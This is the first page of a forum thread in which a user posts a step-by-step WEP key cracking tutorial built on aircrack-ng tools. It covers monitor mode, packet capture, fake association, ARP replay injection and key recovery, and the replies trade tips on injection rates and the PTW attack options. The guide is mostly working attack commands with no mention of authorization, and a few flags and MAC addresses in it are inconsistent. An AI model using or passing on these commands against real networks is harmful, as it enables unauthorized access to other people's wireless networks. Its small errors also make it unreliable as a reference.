Page 1 of 3 123 LastLast
Results 1 to 10 of 22

Thread: My wep tutorial

  1. #1
    Member
    Join Date
    Jul 2007
    Posts
    113

    Default My wep tutorial

    When I do not things repeatedly I normally forget how to do them. So I typed up the steps I take when cracking wep.


    Wep Cracking Guide
    Before attempting to follow this tutorial please update your aircrack to the newest dev version.



    1. Put your card into monitor mode and listen on the correct channel
    airmon-ng start wlan0 6
    start This will put your card into monitor mode.
    wlan0 This is your wireless card's name.
    6 Is the channel that your target ap broadcasts.

    2. Start airodump-ng to capture packets.
    airodump-ng wlan0 -c 6 --bssid 00:11:22:33:44:55 -w output
    wlan0 Is your wireless card's name
    -c 6 Designates which channel airodump should listen for packets on. This should be the same channel as your target ap.
    --bssid 00:11:22:33:44:55 Designates the mac address of your target ap.
    -w output Is the file where all the packers will be saved and output is the name. The files will appear as output-1.cap output-2.cap etc.

    3. Associate with the target ap.
    aireplay-ng -1 60 -q 10 wlan0 -e test -a 00:11:22:33:44:44 -h 00:11:22:33:44:55 -o 1
    -1 60 Tells the card to fake associate with the target ap and reassociate every 60 seconds.
    -q 10 Tells the card to send keep-alive packets every 10 seconds.
    wlan0 Is the name of your wireless card's interface.
    -e Tells the card which ap to target, if the ap has spaces in it surround it with quotations. ie "test ap"
    -a Tells the card the mac address of the ap to target.
    -h Tells the card the mac address of the wireless card you are using.
    -0 1 Tells the card to send 1 packet at a time.

    4. Find your card's maxium bitrate.
    aireplay-ng -9 -B wlan0
    -9 This tests your card to see if it can inject.
    -B performs bitrate test.
    wlan0 Is your wireless card's name.

    5. Set your card's bitrate so you get the most pps (packets per second)
    iwconfig wlan0 rate 54M
    wlan0 Is your wireless card's name.
    rate 54 Sets your bitrate, 54 is the highest. you want to put the highest number that you succesfully got on the bitrate test.

    6. Use ARP replay on the target ap to get ivs.
    aireplay-ng -3 wlan0 -b 00:11:22:33:44:55 -h 00:11:22:33:44:55 -x 100
    -3 Is the standard ARP replay attack.
    wlan0 Is your wireless card's name.
    -b 00:11:22:33:44:55 The mac address of your target ap.
    -h 00:11:22:33:44:%5 The mac address of your wireless card.
    -x 100 The rate of packet injection. (The higher the better, but some aps will disassociate with you if it is too high)

    7. Crack the wep key of your target ap.
    aircrack-ng -b 00:11:22:33:44:55 output*.cap
    -b 00:11:22:33:44:55 Is the mac of your target ap. (aircrack-ng searches through the airodump files for packets matching this mac)
    output*.cap This is the name of the file aircrack-ng will search through for packets. (The * tell aircrack-ng to use any file with the prefix of output)


    Thanks to the aircrack-ng dev team for this great program, and darkAudax for all his wonderful entries in the aircrack-ng wiki.

  2. #2
    Member
    Join Date
    Mar 2007
    Posts
    335

    Default

    Welcome to the Forum!!
    Good start for you with the tut!
    step 6 with -x 100, i use -x 1000. my card likes the overdose of packets, once it comes down it gets in a mood.

  3. #3
    Member
    Join Date
    Jul 2007
    Posts
    113

    Default

    I normally leave it at however fast my card can get, but when the ap can't handle it and it dissociates I have to reduce the packets some. Btw, thanks for the welcome! :-)

  4. #4
    Member
    Join Date
    Mar 2007
    Posts
    335

    Default

    i only associate once, it seems to do the trick. i know what ya mean about different PPS. best results for me is 1000.
    step 7, have a look for the new aircrack-ng or aircrack-ptw. you'l get the key faster with less packets.

  5. #5
    Member
    Join Date
    Jul 2007
    Posts
    113

    Default

    I have the newest version of aircrack-ng, the dev version. The ptw attack on wep is now default. I crack my weps with 10k-40k ivs. I normally get dissociated with the AP because my pps is so high so I have to make sure my card keeps trying to associate and then lower my pps so my card stays associated.

  6. #6
    Developer balding_parrot's Avatar
    Join Date
    May 2007
    Posts
    3,399

    Default

    Quote Originally Posted by Baxter View Post
    i only associate once, it seems to do the trick. i know what ya mean about different PPS. best results for me is 1000.
    step 7, have a look for the new aircrack-ng or aircrack-ptw. you'l get the key faster with less packets.
    The default for the latest dev versions is to use a ptw attack, you now use a switch to not use ptw
    Off the top of my head it's -z
    I think

  7. #7
    Member
    Join Date
    Mar 2007
    Posts
    335

    Default

    i know, but i still like using ptw.

  8. #8
    Senior Member shamanvirtuel's Avatar
    Join Date
    Mar 2010
    Location
    Somewhere in the "Ex" human right country
    Posts
    2,988

    Default

    now you just use
    aircrack-ng to launch ptw attack wich is now default
    aircrack-ng -K allow the old standard attack....

    the -z not longer exist in newer devs...
    Watch your back, your packetz will belong to me soon... xD

    BackTrack :
    Giving Machine Guns to Monkeys since 2006

  9. #9
    Just burned his ISO
    Join Date
    Jul 2007
    Posts
    5

    Default Kismet not needed for wep crack?

    Joseph,

    In your initial post (step-by-step guide) you have not used the KISMET.
    Is that not needed with your guide? or am I missing something?

    Thanks,

  10. #10
    Senior Member shamanvirtuel's Avatar
    Join Date
    Mar 2010
    Location
    Somewhere in the "Ex" human right country
    Posts
    2,988

    Default

    i never use kismet for wep cracking....
    airodump is enough...really....
    Watch your back, your packetz will belong to me soon... xD

    BackTrack :
    Giving Machine Guns to Monkeys since 2006

Page 1 of 3 123 LastLast

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •